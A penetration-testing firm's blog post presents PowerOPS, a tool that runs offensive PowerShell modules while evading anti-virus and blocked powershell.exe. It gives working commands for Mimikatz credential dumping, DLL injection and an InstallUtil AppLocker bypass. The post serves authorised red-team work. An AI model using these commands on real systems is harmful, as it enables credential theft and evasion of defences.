At Portcullis, one of the most frequent assessments we perform are breakouts. One of the main challenges we face during these assessments is to get command execution that can either help escalate our privileges or allow us to gain access to different systems on the network. Sometimes we find harsh group policy restrictions in place that block access to the Windows Command Prompt, PowerShell, among others. These, however, are not always properly implemented, i.e. they do not block access to all executables (and allow only certain programs to run).
After getting command execution, we want to attack other systems on the network. However it isn’t always easy to get a flexible toolbox in the system that allow us to gather information and launch further attacks. PowerShell is our preferred post-exploitation language and powershell.exe access is usually blocked (as .ps1 scripts). However since the block is often incorrectly implemented, i.e. the DLLs used by PowerShell aren’t usually blocked, this can open some doors. On top of that some AVs started implementing some basic signatures that will pick some well known PowerShell scripts. The bypass is trivial but we want to be as stealthy as possible and it still delay us a bit.
How can we bypass some of these “security mitigations” and speed up our tests? PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET). Besides this, it includes multiple offensive PowerShell modules to make the process of post-exploitation easier.
It tries to follow the KISS principle, being as simple as possible. The main goal is to make it easy to use PowerShell offensively and help to evade anti-virus and other mitigations.
To do this, it:
Additionally you can run any valid PowerShell command.
The source code is available at GitHub.
To compile PowerOPS you need to import this project within Microsoft Visual Studio or if you don’t have access to a Visual Studio installation, you can compile it as follows:
To compile it as an x86 binary:
C:\> cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (Or newer .NET version folder) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\> csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:C:\users\username\PowerOPS_x86.exe /platform:x86 "C:\path\to\PowerOPS\PowerOPS\*.cs"
To compile it as an x64 binary:
C:\> cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (Or newer .NET version folder) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\> csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:C:\users\username\PowerOPS_x64.exe /platform:x64 "C:\path\to\PowerOPS\PowerOPS\*.cs"
PowerOPS uses the System.Management.Automation namespace, so make sure you have the System.Management.Automation.dll within your source path when compiling outside of Visual Studio.
Just run the binary and type show to list available modules.
PS > show [-] This computer is not part of a Domain! Some functions will not work! [+] Nishang Get-Information Get-PassHashes Port-Scan [+] PowerSploit Get-KeyStrokes Invoke-DllInjection Invoke-Mimikatz Invoke-NinjaCopy Invoke-Shellcode Invoke-TokenManipulation Invoke-WmiCommand Invoke-ReflectivePEInjection PowerView PowerUp [+] Empire Invoke-PsExec Invoke-SSHCommand [+] Others Auto-GPPPassword Get-ProductKey PowerCat PS >
PowerUp and PowerView are loaded as modules, so Get-Command -module will show you all available functions.
PS > get-command -module powerup CommandType Name ModuleName ----------- ---- ---------- Function Find-DLLHijack PowerUp Function Find-PathHijack PowerUp Function Get-ApplicationHost PowerUp Function Get-ModifiableFile PowerUp Function Get-RegAlwaysInstallElevated PowerUp Function Get-RegAutoLogon PowerUp Function Get-ServiceDetail PowerUp Function Get-ServiceFilePermission PowerUp Function Get-ServicePermission PowerUp Function Get-ServiceUnquoted PowerUp Function Get-UnattendedInstallFile PowerUp Function Get-VulnAutoRun PowerUp Function Get-VulnSchTask PowerUp Function Get-Webconfig PowerUp Function Install-ServiceBinary PowerUp Function Invoke-AllChecks PowerUp Function Invoke-ServiceAbuse PowerUp Function Invoke-ServiceDisable PowerUp Function Invoke-ServiceEnable PowerUp Function Invoke-ServiceStart PowerUp Function Invoke-ServiceStop PowerUp Function Restore-ServiceBinary PowerUp Function Test-ServiceDaclPermission PowerUp Function Write-HijackDll PowerUp Function Write-ServiceBinary PowerUp Function Write-UserAddMSI PowerUp PS >
All your PowerShell fu applies. PowerOPS is basically a PowerShell shell with some modules/functions pre-loaded. So Get-Help is your friend and will help you to understand how the modules can be used.
Let’s say you want to see examples on how to use Invoke-Mimikatz.
PS > Get-Help Invoke-Mimikatz -examples NAME Invoke-Mimikatz SYNOPSIS This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk. The script has a ComputerName parameter which allows it to be executed against multiple computers. This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. Function: Invoke-Mimikatz Author: Joe Bialek, Twitter: @JosephBialek Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: firstname.lastname@example.org. Twitter @gentilkiwi License: http://creativecommons.org/licenses/by/3.0/fr/ Required Dependencies: Mimikatz (included) Optional Dependencies: None Version: 1.5 ReflectivePEInjection version: 1.1 Mimikatz version: 2.0 alpha (2/16/2015) -------------------------- EXAMPLE 1 -------------------------- C:\PS>Execute mimikatz on the local computer to dump certificates. Invoke-Mimikatz -DumpCerts -------------------------- EXAMPLE 2 -------------------------- C:\PS>Execute mimikatz on two remote computers to dump credentials. Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2") -------------------------- EXAMPLE 3 -------------------------- C:\PS>Execute mimikatz on a remote computer with the custom command "privilege::debug exit" which simply requests debug privilege and exits Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1" PS >
Or simply look at the whole help available for Invoke-DllInjection.
PS > Get-Help Invoke-DllInjection -full NAME Invoke-DllInjection SYNOPSIS Injects a Dll into the process ID of your choosing. PowerSploit Function: Invoke-DllInjection Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None SYNTAX Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String> [<CommonParameters>] DESCRIPTION Invoke-DllInjection injects a Dll into an arbitrary process. PARAMETERS -ProcessID <Int32> Process ID of the process you want to inject a Dll into. Required? true Position? 1 Default value 0 Accept pipeline input? false Accept wildcard characters? false -Dll <String> Name of the dll to inject. This can be an absolute or relative path. Required? true Position? 2 Default value Accept pipeline input? false Accept wildcard characters? false <CommonParameters> This cmdlet supports the common parameters: Verbose, Debug, ErrorAction, ErrorVariable, WarningAction, WarningVariable, OutBuffer, PipelineVariable, and OutVariable. For more information, see about_CommonParameters (http://go.microsoft.com/fwlink/?LinkID=113216). INPUTS OUTPUTS NOTES Use the '-Verbose' option to print detailed information. -------------------------- EXAMPLE 1 -------------------------- C:\PS>Invoke-DllInjection -ProcessID 4274 -Dll evil.dll Description ----------- Inject 'evil.dll' into process ID 4274. RELATED LINKS http://www.exploit-monday.com PS >
You can play around with the output…
PS > get-productkey OSDescription Computername OSVersion ProductKey ------------- ------------ --------- ---------- Microsoft Windows... VISUALSTUDIO 6.1.7601 ABCDE-54321-UVXY... PS > get-productkey | format-list OSDescription : Microsoft Windows 7 Professional N Computername : VISUALSTUDIO OSVersion : 6.1.7601 ProductKey : ABCDE-54321-UVXYZ-12345-LMNOP
Save the output of your commands the way you want…
PS > invoke-allchecks | Out-File -Encoding ascii powerup.output.txt PS > type powerup.output.txt [*] Running Invoke-AllChecks [*] Checking if user is in a local group with administrative privileges... [+] User is in a local group that grants administrative privileges! [+] Run a BypassUAC attack to elevate privileges to admin. [*] Checking for unquoted service paths... [*] Checking service executable and argument permissions... [*] Checking service permissions... [*] Checking %PATH% for potentially hijackable .dll locations... [*] Checking for AlwaysInstallElevated registry key... [*] Checking for Autologon credentials in registry... [*] Checking for vulnerable registry autoruns and configs... [*] Checking for vulnerable schtask files/configs... [*] Checking for unattended install files... [*] Checking for encrypted web.config strings... [*] Checking for encrypted application pool and virtual directory passwords... PS >
Do some math…
PS > $a=1 PS > $b=4 PS > $c=$a+$b PS > echo $c 5
Browse the file system…
PS > cd c:\ PS > ls Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 14/02/2016 17:21 bin d---- 17/02/2016 15:02 Dev-Cpp d---- 14/07/2009 04:20 PerfLogs d-r-- 26/04/2016 20:00 Program Files d-r-- 26/04/2016 20:00 Program Files (x86) d---- 19/02/2016 21:06 Python27 d-r-- 26/11/2015 17:20 Users d---- 12/05/2016 15:53 Windows -a--- 19/03/2010 23:55 2073703 VS_EXPBSLN_x64_enu.CAB -a--- 19/03/2010 23:58 551424 VS_EXPBSLN_x64_enu.MSI PS > pwd Path ---- C:\ PS >
And so on…
PowerShell v5 is coming with some new security features that will certainly affect some of the payloads contained in PowerOPS, so further development is expected as well as addition of new attack modules.
PowerOPS includes the InstallUtil AppLocker bypass technique from Casey Smith. To make use of it run as shown below:
C:\> cd \Windows\Microsoft.NET\Framework\v4.0.30319 (Or newer .NET version folder) C:\Windows\Microsoft.NET\Framework\v4.0.30319\> InstallUtil.exe /logfile= /LogToConsole=false /U C:\path\to\PowerOPS.exe
This post describes how Remote Desktop Protocol (RDP) connections can be vulnerable to a downgrade attack if Terminal Servers are configured insecurely. Continue reading
What are cookies and why are they important? Continue reading
Here at Portcullis, we are frequently involved in “red team” exercises, which means we subject an organisation’s information security systems to rigorous testing and analysis. The opposite of a red team is a “blue team”. A blue team attempts to identify and stop the red team from compromising systems. One of the techniques used when red teaming is to write malicious code to test the security systems of our clients. One of the issues we face resides in the fact that we need to bypass sandbox systems that analyse our files in real-time to identify if the potentially malicious file should be blocked and Indicators Of Compromise (IOCs) generated or if the files are benign and safe. At the same time, blue teams that catch our files will try to reverse engineer them in order to understand how we may be compromising systems. Even though the last point is not really relevant for us (ultimately we’re not the bad guys), the first point is. Continue reading
Inter Process Communication (IPC) is an ubiquitous part of modern computing. Processes often talk to each other and many software packages contain multiple components which need to exchange data to run properly. Named pipes are one of the many forms of IPC in use today and are extensively used on the Windows platform as a means to exchange data between running processes in a semi-persistent manner. Continue reading
Recently, Kaspersky published a research about how a russian APT group use hijacked satellite links to anonymise their malware command-and-control (C&C) servers (Satellite Turla: APT Command and Control in the Sky). As they say in their blog post, I researched and published how to abuse satellite DVB-S/2 internet communications, the technique used during the Epic Turla operation. Continue reading
Following a recent post from a consultant at IBM discussing how how privileged access should be performed on VIOS, I figured it was time to share some of our research in this arena. Those of you that are regular readers will know that I love root. For those of you that are new, welcome aboard. Continue reading
This document is a written form of a workshop and presentation I gave at Portcullis Labs in late July 2015. It is a beginner’s walkthrough to understand the recent Flash bug that was discovered in Hacking Team’s pocket and given the sweet name of CVE-2015-5119. It was found and exploited by Vitaliy Toropov. Continue reading
Those of you that have been following the UK infosec market recently will have noticed an upturn in talk relating to “Red Team” style engagements. Unlike a traditional penetration test, the object of such an exercise is not to locate vulnerabilities (though of course that helps) but rather to exercise the “Blue Team” i.e. the internal users at an organisation responsible for defending their network. This change has been driven by CBEST and the associated STAR exam offerings from CREST, which have certainly raised the bar. Whilst most IT security consultancies are happy to talk about phishing, the level to which they go to mimic the target can vary. Continue reading